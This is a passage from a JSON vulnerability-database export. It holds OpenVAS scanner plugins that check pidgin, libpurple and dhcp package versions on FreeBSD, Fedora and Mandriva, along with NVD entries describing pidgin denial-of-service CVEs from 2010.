upgrades.\n\nhttp://pidgin.im/news/security/?id=43\nhttp://pidgin.im/news/security/?id=44\nhttp://pidgin.im/news/security/?id=45\nhttp://www.vuxml.org/freebsd/a2c4d3d5-4c7b-11df-83fb-0015587e2cc1.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67360\");\n script_version(\"$Revision: 8187 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 08:30:09 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: pidgin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pidgin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.6\")<0) {\n txt += 'Package pidgin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"libpurple\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.6\")<0) {\n txt += 'Package libpurple version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:03", "references": [], "pluginID": "67360", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2010-05-04T00:00:00", "title": "FreeBSD Ports: pidgin", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-02-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=67360", "id": "OPENVAS:67360", "sourceData": "#\n#VID a2c4d3d5-4c7b-11df-83fb-0015587e2cc1\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID a2c4d3d5-4c7b-11df-83fb-0015587e2cc1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pidgin\n libpurple\n\nCVE-2010-0277\nslp.c in the MSN protocol plugin in libpurple in Pidgin before 2.6.6,\nincluding 2.6.4, and Adium 1.3.8 allows remote attackers to cause a\ndenial of service (memory corruption and application crash) or\npossibly have unspecified other impact via a malformed MSNSLP INVITE\nrequest in an SLP message, a different issue than CVE-2010-0013.\n\nCVE-2010-0420\nlibpurple in Finch in Pidgin before 2.6.6, when an XMPP multi-user\nchat (MUC) room is used, does not properly parse nicknames containing\n<br> sequences, which allows remote attackers to cause a denial of\nservice (application crash) via a crafted nickname.\n\nCVE-2010-0423\ngtkimhtml.c in Pidgin before 2.6.6 allows remote attackers to cause a\ndenial of service (CPU consumption and application hang) by sending\nmany smileys in a (1) IM or (2) chat.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://pidgin.im/news/security/?id=43\nhttp://pidgin.im/news/security/?id=44\nhttp://pidgin.im/news/security/?id=45\nhttp://www.vuxml.org/freebsd/a2c4d3d5-4c7b-11df-83fb-0015587e2cc1.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(67360);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: pidgin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pidgin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.6\")<0) {\n txt += 'Package pidgin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"libpurple\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.6\")<0) {\n txt += 'Package libpurple version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-22T13:06:00", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "2010-1383"], "pluginID": "1361412562310861660", "description": "Check for the Version of pidgin", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "title": "Fedora Update for pidgin FEDORA-2010-1383", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-01-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861660", "id": "OPENVAS:1361412562310861660", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-1383\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\n\ntag_affected = \"pidgin on Fedora 12\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861660\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1383\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-1383\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.6.6~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:54:38", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "2010-1383"], "pluginID": "861660", "description": "Check for the Version of pidgin", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for pidgin FEDORA-2010-1383", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-12-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861660", "id": "OPENVAS:861660", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-1383\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\n\ntag_affected = \"pidgin on Fedora 12\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html\");\n script_id(861660);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1383\");\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-1383\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.6.6~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-12-21T11:32:27", "references": ["http://lists.mandriva.com/security-announce/2010-02/msg00065.php", "2010:085"], "pluginID": "830919", "description": "Check for the Version of dhcp", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Mandriva Update for dhcp MDVA-2010:085 (dhcp)", "type": "openvas", "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2009-3615", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830919", "id": "OPENVAS:830919", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for dhcp MDVA-2010:085 (dhcp)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"dhcp on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"Dhcp-server package shipped with Mandriva Linux 2009.1 and 2010.0 was\n using incorrect SV_LDAP definitions during the build, which resulted\n in ldap support being non-functional. This update fixes the issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-02/msg00065.php\");\n script_id(830919);\n script_version(\"$Revision: 8186 $\");\n script_cve_id(\"CVE-2009-3615\", \"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\",\n \"CVE-2010-0423\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:46:47 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVA\", value: \"2010:085\");\n script_name(\"Mandriva Update for dhcp MDVA-2010:085 (dhcp)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dhcp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~4.1.0p1~2.3mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.0p1~2.3mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0p1~2.3mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~4.1.0p1~2.3mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~4.1.0p1~2.3mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~4.1.0p1~2.3mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.0p1~2.3mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~4.1.0~5.5mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.0~5.5mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0~5.5mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~4.1.0~5.5mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~4.1.0~5.5mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~4.1.0~5.5mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.0~5.5mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2017-09-19T13:37:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/60566", "http://www.pidgin.im/news/security/index.php?id=47", "http://www.vupen.com/english/advisories/2010/1887", "http://developer.pidgin.im/viewmtn/revision/info/8e8ff246492e45af8f8d0808296d6f2906794dc0", "http://www.vupen.com/english/advisories/2010/2221", "http://www.securityfocus.com/bid/41881", "http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.462873", "http://developer.pidgin.im/viewmtn/revision/diff/fcb70f7c12120206d30ad33223ff85be7b226d1c/with/8e8ff246492e45af8f8d0808296d6f2906794dc0/libpurple/protocols/oscar/family_icbm.c"], "description": "The clientautoresp function in family_icbm.c in the oscar protocol plugin in libpurple in Pidgin before 2.7.2 allows remote authenticated users to cause a denial of service (NULL pointer dereference and application crash) via an X-Status message that lacks the expected end tag for a (1) desc or (2) title element.", "edition": 3, "reporter": "NVD", "published": "2010-07-30T09:26:15", "title": "CVE-2010-2528", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:00", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:18359", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18359"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-2528"], "scanner": [], "modified": "2017-09-18T21:31:01", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.7.0", "cpe:/a:pidgin:pidgin:2.6.6", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.7.1", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-2528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2528", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:56", "references": ["http://developer.pidgin.im/viewmtn/revision/diff/884d44222e8c81ecec51c25e07d005e002a5479b/with/894460d22c434e73d60b71ec031611988e687c8b/libpurple/protocols/msn/slp.c", "http://www.vupen.com/english/advisories/2010/2755", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:097", "http://www.redhat.com/support/errata/RHSA-2010-0788.html", "http://www.securityfocus.com/bid/40138", "http://www.vupen.com/english/advisories/2010/1141", "http://developer.pidgin.im/viewmtn/revision/info/894460d22c434e73d60b71ec031611988e687c8b", "https://exchange.xforce.ibmcloud.com/vulnerabilities/58559", "http://www.ubuntu.com/usn/USN-1014-1", "https://bugzilla.redhat.com/show_bug.cgi?id=589973", "http://www.pidgin.im/news/security/index.php?id=46"], "description": "The msn_emoticon_msg function in slp.c in the MSN protocol plugin in libpurple in Pidgin before 2.7.0 allows remote authenticated users to cause a denial of service (NULL pointer dereference and application crash) via a custom emoticon in a malformed SLP message.", "edition": 3, "reporter": "NVD", "published": "2010-05-14T15:30:01", "title": "CVE-2010-1624", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:56", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:18547", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18547"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-1624"], "scanner": [], "modified": "2017-09-18T21:30:47", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.5.3:32_bit", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.5:32_bit", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.0.2::linux", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.4.3:32_bit", "cpe:/a:pidgin:pidgin:2.6.6", "cpe:/a:pidgin:pidgin", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.5.2:32_bit", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.5.0:32_bit", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.4.1:32_bit", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.4:32_bit", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.4.0:32_bit", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.4.2:32_bit", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-1624", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1624", "cvss": {"score": 5.0, "vector": 